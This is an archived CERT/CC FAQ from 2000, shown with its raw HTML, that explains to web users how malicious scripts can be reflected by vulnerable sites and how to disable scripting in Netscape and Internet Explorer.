CERT/CC Malicious Web Scripts FAQ - A problem has recently been identified that can be found on a wide variety of web sites: what you receive from a web site may not be what that site meant to send. If you click on a specially designed link, the site may unknowingly send you bad data, unwanted pictures, and programs (malicious scripts) to compromise your data. The problem is not with web browsers themselves but with how web pages are constructed and how data entering and leaving web sites is validated. "Validate" means ensuring no "unintended" characters are sent back to the client.
00055408adebcb44c3a895e806085eec<!DOCTYPE HTML PUBLIC "html.dtd">
<HTML>
<HEAD>
<TITLE>CERT/CC Malicious Web Scripts FAQ</TITLE>
</HEAD>
<BODY>
<BODY BGCOLOR="#FFFFFF" VLINK="#C7AA05" LINK="#004A6B" ALINK="#DDB30B">
<DIV ALIGN="left">
<TABLE WIDTH="100%" CELLSPACING="0" BORDER="0" CELLPADDING="0">
<TR>
<TD WIDTH="50%">
<A HREF="http://www.sei.cmu.edu/"> <IMG SRC="http://www.cert.org/images/cmu_sei.gif" WIDTH="239" HEIGHT="37" ALT="The CERT/CC is
part of the Software Engineering Institute at Carnegie Mellon University" BORDER="0"> </A></TD>
<TD WIDTH="50%" VALIGN="middle" ALIGN="right">
<IMG SRC="http://www.cert.org/images/improvingsecurity.gif" WIDTH="123" ALT="Improving Security" HEIGHT="19" ALIGN="bottom"> </TD>
</TR>
</TABLE>
</DIV>
<DIV ALIGN="left">
<TABLE WIDTH="100%" CELLSPACING="0" BORDER="0" CELLPADDING="0">
<TR>
<TD WIDTH="54">
<IMG SRC="http://www.cert.org/images/invisible.gif" WIDTH="54" ALT="" HEIGHT="1"></TD>
<TD WIDTH="18%">
<A HREF="http://www.cert.org/nav/index.html"><IMG SRC="http://www.cert.org/images/certcc_head.gif" WIDTH="189" ALT="CERT® Coordination Center" HEIGHT="18" BORDER="0"></A></TD>
<TD WIDTH="85%" BGCOLOR="#DCDCDC">
<P ALIGN="left"><SMALL><SMALL><FONT FACE="Helvetica, Geneva, Arial">
<A HREF="http://www.cert.org/index.html">Home</A> |
<A HREF="http://www.cert.org/nav/whatsnew.html">What's New</A> |
<A HREF="http://www.cert.org/faq/cert_faq.html">FAQ</A> |
<A HREF="http://www.cert.org/contents/contents.html">Site Contents</A> |
<A HREF="http://www.cert.org/contact_cert/contactinfo.html">Contact Us</A> |
<B><A HREF="http://search.cert.org:8765/">SEARCH</A></B>
</FONT></SMALL></SMALL></TD>
</TR>
</TABLE>
</DIV>
<DIV ALIGN="left">
<TABLE WIDTH="100%" CELLSPACING="1" BORDER="0" CELLPADDING="5">
<TR>
<TD WIDTH="47">
<IMG SRC="http://www.cert.org/images/invisible.gif" WIDTH="47" ALT="" HEIGHT="1"></TD>
<TD WIDTH="100%" ALIGN="left"><P ALIGN="left">
<FONT SIZE="1" COLOR="#004A6B" FACE="Helvetica, Geneva, Arial">
<A HREF="http://www.cert.org/nav/aboutcert.html">About Us</A> |
<A HREF="http://www.cert.org/nav/alerts.html">Alerts</A> |
<A HREF="http://www.cert.org/nav/training.html">Education and Training</A> |
<A HREF="http://www.cert.org/nav/events.html">Events</A> |
<A HREF="http://www.cert.org/ftp/">FTP Archives</A> |
<A HREF="http://www.cert.org/nav/securityimprovement.html">Improving Security</A> |
<A HREF="http://www.cert.org/nav/other_sources.html">Other Resources</A> |
<A HREF="http://www.cert.org/nav/reports.html">Reports</A> |
<A HREF="http://www.cert.org/research/">Survivability Research</A></FONT></TD>
</TR>
<TR>
<TD WIDTH="47">
<IMG SRC="http://www.cert.org/images/invisible.gif" WIDTH="47" ALT="" HEIGHT="1"></TD>
<TD WIDTH="100%" HEIGHT="12"></TD>
</TR>
</TABLE>
</DIV>
<!-- This section leaves a table definition open. -->
<!-- Each document must close it somewhere else. -->
<DIV ALIGN="left">
<TABLE WIDTH="100%" BORDER="0">
<TR>
<TD WIDTH="47" VALIGN="top">
<IMG SRC="http://www.cert.org/images/invisible.gif" WIDTH="47" ALT="" HEIGHT="1">
</TD>
<!-- This section opens the table cell that contains the gray side bar. -->
<!-- This table cell is closed at the end of sidebar include. -->
<!-- A new table cell is also begun at the end of the sidebar -->
<!-- The table cell, row, and table must be ended in the main document -->
<TD VALIGN="top">
<DIV ALIGN="left">
<TABLE WIDTH="100" HEIGHT="225" ALIGN="left" CELLSPACING="0" BORDER="0" CELLPADDING="7">
<TR>
<TD BGCOLOR="#DCDCDC" VALIGN="top" HEIGHT="175">
<FONT FACE="Helvetica, Geneva, Arial" COLOR="#004A6B"><SMALL><SMALL>
<P><A HREF="http://www.cert.org/incident_notes/">Incident Notes</A>
<P><A HREF="http://www.cert.org/vul_notes/">Vulnerability Notes</A>
<P><A HREF="http://www.cert.org/security-improvement/">Security Improvement Modules</A>
<P><A HREF="http://www.cert.org/tech_tips/">Tech Tips</A>
<P><A HREF="http://www.cert.org/ftp/tools/">Tools</A>
<P><A HREF="http://www.cert.org/other_sources/tool_sources.html">Other sources of tools</A>
<P><A HREF="http://www.cert.org/nav/training.html">Training</A>
<P><A HREF="http://www.cert.org/nav/alerts.html">Alerts</A>
<P><A HREF="http://www.cert.org/y2k-info">Y2K</A>
</SMALL></SMALL></FONT>
</TD>
<TD WIDTH="3" VALIGN="top" ROWSPAN="2"></TD>
</TR>
<TR>
<TD VALIGN="top" HEIGHT="5"></TD>
</TR>
</TABLE>
</DIV>
<!-- starts new table cell for table begun in titlebar -->
</TD>
<TD WIDTH="100%" VALIGN="top">
<FONT FACE="Helvetica, Geneva, Arial">
<SMALL>
<H2>CERT<SUP>®</SUP> Coordination Center</H2>
<H1>Frequently Asked Questions About Malicious Web Scripts Redirected by
Web Sites</H1>
<P>
Original release date: February 2, 2000<BR>
Last updated: February 3, 2000<BR>
<HR NOSHADE SIZE="2" ALIGN="left">
<P>A problem has recently been identified that can be found on a wide
variety of web sites: what you receive from a web site may not be what
that site meant to send. If you click on a specially designed link,
the site may unknowingly send you bad data, unwanted pictures, and
programs (malicious scripts) to compromise your data.
<P>The problem is not with web browsers themselves but with how web
pages are constructed and how data entering and leaving web sites is
validated. "Validate" means ensuring no "unintended" characters are
sent back to the client.
<P>This document includes:
<OL TYPE="I">
<LI><A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#FAQ">Frequently Asked Questions</A>
<LI><A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps">Steps for Changing Your Options in Web Browsers</A>
</OL>
<HR NOSHADE SIZE="2" ALIGN="left">
<A NAME="FAQ"><H3>I. Frequently Asked Questions </H3></A>
<H4>How do malicious web scripts get to my web browser?</H4>
<P>A malicious web developer may attach a script to something you send
to a web site, such as a URL, an element in a form, or a database
inquiry. When the web site responds to you, the malicious script comes
along, so that it is now on your browser.
<P>Among the ways you can potentially expose your web browser to
malicious scripts are these:
<UL>
<LI>following untrusted links in web pages, email messages, or
newsgroup postings
<LI>using interactive forms on an untrustworthy site
<LI>viewing dynamically generated pages that contain content
developed by anyone but yourself
</UL>
<P>You might link to what you consider a safe site, complete a form on
a site that is not trustworthy, or search a database there.
<H4>What might happen if my web browser is exposed to a malicious script?</H4>
<P>Among the possibilities are capturing your password and other
information you believe is protected. You should also be concerned
because malicious scripts can be used to expose restricted parts of
your organization's local network (such as their intranet) to
attackers who are on the Internet.
<P>Attackers may also be able to use malicious scripts to infect
cookies with copies of themselves. If the infected cookie is sent back
to a vulnerable web site and passed back to your browser, the
malicious script may start running again. Note: This is not a
vulnerability in web cookies; rather, a malicious script takes
advantage of the functionality of cookies.
<H4>How can I avoid the problem? </H4>
<P>The most significant impact of this vulnerability can be avoided by
disabling all scripting languages. Follow the steps <A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps">below</A>
to turn off options in your web browser that
allow malicious scripts to run. If you're not using a current version
of Netscape or Internet Explorer, (version 4 and 5, respectively), you
might need to modify the steps.
<P>Note that even with scripting disabled, attackers may still be able
to influence the appearance of content provided by a legitimate site
by embedding other HTML tags. In particular, malicious use of the
<FORM> tag is not prevented by disabling scripting languages.
<H4>How will turning off the options affect my use of the web?</H4>
<P>Turning off the options will keep you from being vulnerable to
malicious scripts. However, it will limit the interaction you can have
with some web sites. You may notice a difference in functionality when
you visit legitimate sites that use scripts running within the browser
to add useful features.
<A NAME="java"><H4>Should I disable Java applets?</H4></A>
<P>The risk associated with Java applets is significantly different
from some of the other technologies. Java has a robust security
mechanism designed to deal with situations like these that prevents
sensitive information from being disclosed or client information from
being damaged.
<P>However, Java applets written by an attacker can still be loaded
while your are viewing a legitimate web page. The problems that can
arise are similar to those involving the <FORM> and other HTML
tags. For example, an attacker could develop a "Trojan Horse" program
that presented misleading information and prompted you for a password.
If you failed to recognize the malicious applet for what it was, you
could accidentally disclose sensitive information.
<P>You must make your own determination about disabling Java applets,
based on your tolerance for these risks. If you choose to disable
Java, please see the detailed <A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps">instructions</A> below.
<H4>Isn't there a better way to fix the problem?</H4>
<P>The CERT/CC is working with technology vendors and other security
experts on a long-term, comprehensive solution to the problem of
malicious scripts running on browsers.
<H4>Is there any more information available about this problem?</H4>
<P>The CERT/CC has published an advisory containing more details about
the problem, its impact, and ways to deal with it. CA-2000-02 is
available from
<UL>
<A HREF="http://www.cert.org/advisories/CA-2000-02.html">
http://www.cert.org/advisories/CA-2000-02.html </A>
</UL>
<P>You can also find information at the vendor URLs listed in the
advisory.
<P>The CERT/CC has also published a "tech tip" for web page developers
and web site administrators, which you might want to pass along to the
appropriate people in your organization. This document, "Malicious
Content Mitigation for Web Developers," is available from
<UL>
<A HREF="http://www.cert.org/tech_tips/malicious_code_mitigation.html">
http://www.cert.org/tech_tips/malicious_code_mitigation.html</A>
</UL>
<HR NOSHADE SIZE="2" ALIGN="left">
<A NAME="steps"><H3>II. Steps for Changing Your Options in Web
Browsers - Netscape and Internet Explorer </H3></A>
<H4>Using Netscape 3.0 or higher</H4>
<P><B>Note:</B> If you are not using Netscape version 3.0 or higher,
these instructions may not be correct. To determine your software
version, from the <B>Help</B> menu, select <B>About
Communicator... </B>. A web page appears with information about your
browser including the version number.
<OL>
<LI>Start Netscape Communicator as you would when browsing the
Internet.
<LI>From the <B>Edit</B> menu, select <B>Preferences</B>. The
Preferences dialog box appears.
<LI> From the <B>Category</B> list, click on <B>Advanced</B>. (Do NOT
click on the plus (+) sign.) The Advanced Preferences panel appears.
<LI> If you <A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#java">decide to disable java</A>, uncheck
<B>Enable Java</B>.
<LI> Uncheck <B>Enable JavaScript</B>.
<LI> Click <B>OK</B> to accept the changes.
<LI> Click the <B>Padlock Icon </B> in the lower left hand corner of
your browser. The Security Info dialog box appears.
<LI>Click the <B>Navigator</B> link from the list on the left. The
Navigator Security Settings panel appears.
<LI>In the <B>Show a warning before:</B> section, make sure the
options <B>Viewing a page with encrypted/unencrypted mix </B> and
<B>Leaving an encrypted site </B> are checked.
<LI>Click <B> OK </B> to accept the changes and close the dialog box.
</OL>
<H4>Using Internet Explorer 5</H4>
<P>
<B>Note:</B> If you are not using Internet Explorer version 5, these
instructions may not work correctly. To determine your software
version, from the <B>Help</B> menu, select <B>About Internet
Explorer... .</B> A dialog box appears with information about your
browser including the version number.
<OL>
<LI> Start Internet Explorer as you would when browsing the Internet.
<LI> From the <B>Tools</B> menu select <B>Internet
Options... </B>. The Internet Options dialog box appears.
<LI> Select the <B>Security</B> tab. The Security Options panel
appears.
<LI> Click on the <B>Internet</B> zone to select it.
<LI> Click the <B>Custom Level</B> button. The Security Settings panel
appears.
<LI> Select the <B>High</B> option from the pull-down list.
<LI> Click the <B>Reset</B> button. A dialog box appears asking if you
are sure you want to change the security settings for this zone.
<LI> Click <B>Yes</B>.
You now need to scroll through the settings list and make the changes
listed in the following steps.
<LI> For the setting <B>Scripting ActiveX controls marked safe for
Scripting</B>, check the radio button for <B>Disable</B> or
<B>Prompt</B> depending on your level of trust.
<LI> If you <A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#java">decide to disable
Java</A>, for the setting <B>Java permissions</B>, check the radio button
for <B>Disable Java</B>. Note: If you have Microsoft Virtual Machine installed, this
setting will be under the <B>Microsoft VM</B> section. If you do not
have a <B>Java permissions</B> setting, Java is already disabled.
<LI> For the setting <B>Active scripting</B> under the
<B>Scripting</B> section, check the radio button for <B>Disable</B>.
<LI> Click <B>OK</B> to accept these changes. A dialog box appears
asking if you are sure you want to make these changes.
<LI> Click <B>Yes</B>.
<LI>In the Internet Options dialog box, click the <B>Advanced </B>
tab. The Advanced Options panel appears.
<LI>Make sure the setting <B>Warn if changing between secure and
insecure</B> under the <B>Security</B> setting is checked.
<LI> Click <B>Apply</B> to save your changes.
<LI> Click <B>OK</B> to close the Internet Options dialog box.
</OL>
<HR WIDTH="100%" NOSHADE>
This document is available from:
<A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html">
http://www.cert.org/tech_tips/malicious_code_FAQ.html</A>
<HR WIDTH="100%" NOSHADE>
<H2>CERT/CC Contact Information</H2>
<DL>
<B>Email:</B> <A HREF="mailto:cert@cert.org">cert@cert.org</A><BR>
<B>Phone:</B> +1 412-268-7090 (24-hour hotline)<BR>
<B>Fax:</B> +1 412-268-6989<BR>
<B>Postal address:</B><BR>
<DD>
CERT<SUP>®</SUP> Coordination Center<BR>
Software Engineering Institute<BR>
Carnegie Mellon University<BR>
Pittsburgh PA 15213-3890<BR>
U.S.A.<BR>
</DL>
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.
<P>
<H4>Using encryption</H4>
<P>We strongly urge you to encrypt sensitive information sent by
email. Our public PGP key is available from<P>
<UL>
<A HREF="http://www.cert.org/CERT_PGP.key">http://www.cert.org/CERT_PGP.key</A>
</UL>
If you prefer to use DES, please call the CERT hotline for more
information.<P>
<H4>Getting security information</H4>
CERT publications and other security information are available from
our web site<P>
<UL>
<A HREF="http://www.cert.org/">http://www.cert.org/</A>
</UL>
To be added to our mailing list for advisories and bulletins, send email to
<A HREF="mailto:cert-advisory-request@cert.org">
cert-advisory-request@cert.org</A> and include <TT>SUBSCRIBE
your-email-address</TT> in the subject of your message.
<P>
Copyright 1999 Carnegie Mellon University.<BR>
Conditions for use, disclaimers, and sponsorship information can be found in<P>
<UL>
<A HREF="http://www.cert.org/legal_stuff.html">http://www.cert.org/legal_stuff.html</A>
</UL>
* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
<HR WIDTH="100%" NOSHADE>
<B><U>NO WARRANTY</U></B><BR>
<B>Any material furnished by Carnegie Mellon University and the
Software Engineering Institute is furnished on an "as is"
basis. Carnegie Mellon University makes no warranties of any kind,
either expressed or implied as to any matter including, but not
limited to, warranty of fitness for a particular purpose or
merchantability, exclusivity or results obtained from use of the
material. Carnegie Mellon University does not make any warranty of any
kind with respect to freedom from patent, trademark, or copyright
infringement.</B>
<HR NOSHADE SIZE="2" ALIGN="LEFT">
<TABLE>
<A NAME="history">
<TR>
<TD>
<FONT SIZE="3" FACE="Helvetica, Geneva, Arial">
Revision History
</TD>
</TR>
<TR>
<TD WIDTH="30%" VALIGN="TOP">
<FONT SIZE="2" FACE="Helvetica, Geneva, Arial">
Feb 2, 2000<BR>
</TD>
<TD WIDTH="70%" VALIGN="TOP">
<FONT SIZE="2" FACE="Helvetica, Geneva, Arial">
Initial Release<BR>
</TD>
</TR>
</SMALL>
</TABLE>
<HR NOSHADE SIZE="2" ALIGN="LEFT">
<TABLE WIDTH="100%" HEIGHT="50%">
<TR>
<TD WIDTH="100%" VALIGN="TOP">
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
</DIV>
</BODY>
</HTML>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!